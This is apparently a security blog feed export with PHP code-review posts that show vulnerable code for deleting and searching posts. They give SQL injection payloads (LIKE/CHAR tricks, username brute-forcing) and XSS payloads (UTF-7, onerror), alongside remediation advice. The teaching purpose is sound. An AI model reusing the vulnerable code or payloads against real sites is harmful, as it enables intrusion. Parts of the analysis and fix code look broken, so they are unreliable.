<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"></span></span><br />
<b style="font-family: Calibri, sans-serif; font-size: 11pt;">Note: </b><span style="font-family: Calibri, sans-serif; font-size: 11pt;">In this example we request a file name using wild card characters e.g. *. More specifically </span><span style="font-family: Calibri, sans-serif; font-size: 11pt;">.</span><br />
<br />
<b style="font-size: 11pt;">Remediation</b><span style="font-size: 11pt;"> </span><br />
<span lang="EN-US" style="text-align: justify;"><br /></span>
<span lang="EN-US" style="text-align: justify;">Disable the MultiViews directive from Apache's configuration file and
restart Apache.</span><span lang="EN-US" style="text-align: justify;"> </span><span lang="EN-US" style="text-align: justify;">You can disable MultiViews by creating a
.htaccess file containing the following line:</span><br />
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><span lang="EN-US" style="font-size: 11pt;"><br /></span></span></span>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;">
<span lang="EN-US" style="font-size: 11pt;">Options -Multiviews</span></span></span><br />
<br />
<b>References: </b><br />
<ol>
<li><a href="http://www.wisec.it/sectou.php?id=4698ebdc59d15">http://www.wisec.it/sectou.php?id=4698ebdc59d15</a></li>
<li><a href="http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/">http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/</a></li>
<li><a href="http://www.securityfocus.com/bid/3009">http://www.securityfocus.com/bid/3009</a></li>
</ol>
</div>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-37117548644715565352014-04-17T11:52:00.002-07:002017-01-12T14:34:53.821-08:00PHP Source Code Chunks of Insanity (Delete Post Pages) Part 4<b>Intro </b><br />
<br />
This post is going to talk about source code reviewing PHP and demonstrate how a relatively small chunk of code can cause you lots of problems.<br />
<b><br /></b><b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code displayed below might seem innocent for some , but obviously is not. We are going to assume that is used by some web site to delete posts from the logged in users securely.
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <?php
require_once 'common.php';
validatemySession();
mydatabaseConnect();
$username = $_SESSION['username'];// Insecure source
$username = stripslashes($username);// Improper filtering
$username = mysql_real_escape_string($username);//Flawed function
// Delete the post that matches the postId ensuring that it was created by this user
$queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId']. " AND Username = '$username'";
if (mysql_query($queryDelete))// Bad validation coding {
header('Location: myPosts.php'); }
else {
echo "An error has occurred.";
}
?>
</code></pre>
<br />
If you look carefully the code you will se that the code is vulnerable to the following issue: SQL Injection!!<br />
<span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
Think this is not accurate , think better.<br />
<div>
<br /></div>
<div>
<b>The SQL Injection</b></div>
<div>
<b><br /></b></div>
<div>
<span style="font-family: "cambria"; font-size: 12.000000pt;">An adversary in order to exploit this vulnerability would not have to script custom tools, would only
have to have good knowledge of SQL injections methodologies and exposure to PHP coding.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span></div>
<div>
<div class="column">
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>1st Code Chunk</u> </span></div>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $username = $_SESSION['username'];// Insecure source
$username = stripslashes($username);// Improper filtering </code></pre>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $username = mysql_real_escape_string($username);//Flawed function </code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>2nd Code Chunk: </u></span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId']. " AND Username = '$username'"; </code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>3rd Code Chunk: </u> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> if (mysql_query($queryDelete))
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">The </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mysql_real_escape_string </span><span style="font-family: "cambria"; font-size: 12.000000pt;">function is based in the black list mentality. What it does is that escapes
special characters in the un-‐escaped string, taking into account the current character set of the
connection so that it is safe to place it in a </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mysql_query. </span><span style="font-family: "cambria"; font-size: 12.000000pt;">More specifically </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mysql_real_escape_string
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">calls MySQL's library function </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mysql_real_escape_string, </span><span style="font-family: "cambria"; font-size: 12.000000pt;">which prepends backslashes to the following
characters:</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">1. \x00 </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">2. \n</span><br />
<span style="font-family: "cambria"; font-size: 12pt;">3. \r</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">4. \<br />
5. '<br />
6. “</span><br />
<span style="font-family: "cambria"; font-size: 12pt;">7. \x1a.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Due to this odd behavior characters such as the % and SQL keywords are not being affected, so queries
that have the form of e.g. SELECT BENCHMARK(50,MD5(CHAR(118))) would be executed normally. A
realistic scenario would be to use a query such as the one below:</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Step1: </span><span style="font-family: "cambria"; font-size: 12pt;">SQL Payload that would cause the post to delete without the postId be known.</span><span style="font-family: "cambria"; font-size: 12.000000pt;"> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> LIKE %’s’ </code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note1: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">At this point we assume that the attacker knows the format of the username e.g. its user plus a
two-‐digit number. </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Step2: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">SQL Payload mutated in order to bypass the filters.</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> LIKE CHAR(37, 8217, 115, 8217) </code></pre>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note2: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">Further expanding on the attack if the Web App does not have a standard format for the
usernames then the adversary can brute-‐force the username first latter e.g. try out all English letters
e.g. </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">LIKE %’a’, LIKE %’b’, LIKE %’c’ </span><span style="font-family: "cambria"; font-size: 12.000000pt;">... etc. and eventually execute the query with a valid first username
letter. Translating that to an obfuscated SQL Payload would be </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">LIKE CHAR(39, 97, 37, 39), LIKE
CHAR(39, 98, 37, 39) </span><span style="font-family: "cambria"; font-size: 12.000000pt;">etc.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note3: </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">The mysql_real_escape_string </span><span style="font-family: "cambria"; font-size: 12.000000pt;">function is deprecated as of PHP 5.5.0, and will be removed in
the future. Instead, the MySQLi or PDO_MySQL extension should be used. Alternatives to this function
include: </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mysqli_real_escape_string </span><span style="font-family: "cambria"; font-size: 12.000000pt;">and </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">PDO::quote. </span><span style="font-family: "cambria"; font-size: 12pt;">The </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">mysql_query() </span><span style="font-family: "cambria"; font-size: 12pt;">function sends a unique query (multiple queries are not supported) to the currently
active database on the server that's associated with the specified link_identifier. In this specific code
example the query returns true if a record is found (any record). This obscure behavior introduces the
vulnerability combined of course with the above code. The function used in the </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">mysql_query </span><span style="font-family: "cambria"; font-size: 12pt;">statement
should return a record set only if the correct record set is returned and not just any match.</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note4: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">This extension is deprecated as of PHP 5.5.0.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Provide Server Side filters filter for remediating the vulnerability. Make use of strongly typed
parameterized queries (using the </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">bind_param).</span><br />
<div class="column">
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> // Using prepared Statements.
if ($stmt = $mysqli-‐>prepare("DELETE FROM posts WHERE PostId = ? AND Username = ? LIMIT 1"))
{
$stmt-‐>bind_param('s', $ username); // Bind "$ username" to parameter. </code></pre>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $stmt-‐>execute(); // Execute the prepared statement.
...
}
</code></pre>
</div>
</div>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">Other counter measures would include black list filtering of SQL keywords such as the LIKE and
CHAR keywords.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">References:
</span><br />
<ol>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="color: blue; font-size: 12pt;"><a href="http://php.net/manual/en/function.mysql-%C2%AD%E2%80%90real-%C2%AD%E2%80%90escape-%C2%AD%E2%80%90string.php" target="_blank">http://php.net/manual/en/function.mysql-‐real-‐escape-‐string.php</a></span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="color: blue; font-size: 12pt;"><a href="http://dev.mysql.com/doc/refman/5.0/en/pattern-%C2%AD%E2%80%90matching.html" target="_blank">http://dev.mysql.com/doc/refman/5.0/en/pattern-‐matching.html</a></span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="color: blue; font-size: 12pt;"><a href="http://php.net/manual/en/function.mysql-%C2%AD%E2%80%90query.php" target="_blank">http://php.net/manual/en/function.mysql-‐query.php</a></span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="color: blue; font-size: 12pt;"><a href="http://www.php.net/manual/en/pdo.query.php" target="_blank">http://www.php.net/manual/en/pdo.query.php</a></span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="color: blue; font-size: 12pt;"><a href="http://stackoverflow.com/questions/7069640/are-%C2%AD%E2%80%90there-%C2%AD%E2%80%90any-%C2%AD%E2%80%90security-%C2%AD%E2%80%90benefits-%C2%AD%E2%80%90to-%C2%AD%E2%80%90using-%C2%AD%E2%80%90%20pdoquery-%C2%AD%E2%80%90vs-%C2%AD%E2%80%90mysql-%C2%AD%E2%80%90query" target="_blank">http://stackoverflow.com/questions/7069640/are-‐there-‐any-‐security-‐benefits-‐to-‐using-‐pdoquery-‐vs-‐mysql-‐query </a></span><br />
</li>
</ol>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-83371762191390819842014-04-15T17:06:00.002-07:002017-01-12T14:35:01.001-08:00PHP Source Code Chunks of Insanity (Post Pages) Part 3<b>Intro </b><br />
<br />
This post is going to talk about source code reviewing PHP and demonstrate how a relatively small chunk of code can cause you lots of problems.<br />
<b><br /></b><b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code displayed below might seem innocent for some , but obviously is not. We are going to assume that is used by some web site to post the user comments securely.<span style="background-color: #f0f0f0; font-family: "arial"; font-size: 12px; line-height: 20px;"></span><br />
<pre style="background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); height: auto; overflow: auto; padding: 0px; text-align: left; width: 99%;"><div class="column" style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><?php
require_once 'common.php';
validateMySession();
</span>?>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><html>
<head>
<title>User Posts</title>
</head>
<body>
<h1>Showing current posts</h1>
<form action='awsomePosts.php'></span></div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="line-height: 20px;"> <p>MySearch: <input type='text' </span></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="line-height: 20px;"> value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>
<p><input type='submit' value='MySearch'></p></span></span>
<div style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> </form>
<?php showAwsomePosts();?>
</body> </span></div>
<div style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></html></span></div>
</pre>
If you look carefully the code you will se that the code is vulnerable to the following issue: Stored XSS!!<br />
<span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
Think this is not accurate , think better.<br />
<br />
<b>The Stored XSS</b><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary would need to have very good knowledge of encoding/XSS attacks to exploit this
vulnerability. This vulnerability is based on a well known UTF-‐7 encoding attack that is considered to
be old. Other filter bypassing techniques can be used to bypass htmlentities such as JavaScript events.</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12.000000pt;"> </span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1: <p>MySearch: <input type='text' value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>// Vulnerable to XSS UTF-‐7 attack
</code></pre>
<div>
<span style="font-family: "cambria"; font-size: 12pt;">The page that the potential XSS resides on doesn't provide a page charset header (e.g. </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">header('Content-‐
Type: text/html; charset=UTF-‐8'); </span><span style="font-family: "cambria"; font-size: 12pt;">or </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;"><HEAD><META HTTP-‐EQUIV="CONTENT-‐TYPE"
CONTENT="text/html; charset=UTF-‐8">), </span><span style="font-family: "cambria"; font-size: 12pt;">any browser that is set to UTF-‐7 encoding can be exploited
with the following XSS input (she don't need the charset statement if the user's browser is set to auto-‐
detect and there is no overriding content-‐types on the page in Internet Explorer and Netscape
rendering engine mode). This does not work in any modern browser without changing the encoding
type.</span><br />
<u style="font-family: Cambria; font-size: 12pt;"><br /></u>
<u style="font-family: Cambria; font-size: 12pt;">Example1 UTF-‐7 Encoding</u></div>
<div class="column">
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">Input Payload :<br />
</span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1: <script>alert(1)</script>
</code></pre>
<div>
<code style="word-wrap: normal;"><br /></code></div>
<span style="font-family: "cambria"; font-size: 12.000000pt;">Output (UTF-‐7): </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: +ADw-‐script+AD4-‐alert('XSS')+ADw-‐/script+AD4APA-‐/vulnerable+AD4-‐
</code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span><span style="font-family: "cambria"; font-size: 12.000000pt;"><u>Example2 JavaScript Events</u></span></div>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Injecting also JavaScript events to the htmlentities function of php will also by pass the filter.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The code before injection: </span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1<p>MySearch: <input type='text' value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">The code after injection:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"><p>MySearch: <input type='text' value='onerror='alert(String.fromCharCode(88, 83, 83))'></p>
</code></pre>
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">This example needs further testing to see if it is applicable.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">Provide Server Side filters for the vulnerability. Make use of regular expressions and html encode the
variables whether displayed back to the user or not.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>1st Layer of defense </u></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: //XSS filter the value because this value might be printed later on back in the user. if preg_match ("/[a-‐zA-‐Z]+/", "", $search){
2: showPosts();
3: }
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">Using regular expressions to replace parts of the input and proceed with further processing the
input is not recommended, once a malicious input is identified should be rejected (e.g. using
</span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">preg_match </span><span style="font-family: "cambria"; font-size: 12pt;">instead of </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">preg_replace).</span><br />
<span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;"><br /></span>
<u><span style="font-family: "cambria"; font-size: 12pt;">2nd Layer of defense</span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;"> </span></u><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: header('Content-‐Type: text/html; charset=UTF-‐8');
2: // This function will convert both double and single quotes. mb_convert_encoding($search, 'UTF-‐8');
</code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Countermeasures Summarized
</span><br />
<ol style="list-style-type: decimal;">
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Specify charset clearly (HTTP header is recommended)
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Don't place the text attacker can control before <meta>
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Specify recognizable charset name by browser.
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Apply regular expressions based on the white list mentality.
</span><br />
</li>
</ol>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mb_convert_encoding </span><span style="font-family: "cambria"; font-size: 12.000000pt;">converts the character encoding of the input string to the desired
encoding. </span></div>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
